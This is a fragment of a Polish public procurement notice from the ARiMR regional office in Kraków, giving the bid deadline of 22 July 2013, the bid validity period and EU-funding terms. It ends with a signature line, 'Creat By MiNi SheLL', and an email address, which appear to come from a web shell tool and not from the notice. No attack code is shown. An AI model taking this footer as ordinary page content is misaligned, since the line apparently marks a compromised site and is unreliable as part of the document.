<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Małopolski Oddział Regionalny ARiMR, ul. Lubicz 25, 31-503 Kraków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.07.2013 godzina 11:00, miejsce: Małopolski Oddział Regionalny ARiMR, ul. Lubicz 25, 31-503 Kraków, Dziennik Podawczy, IV piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com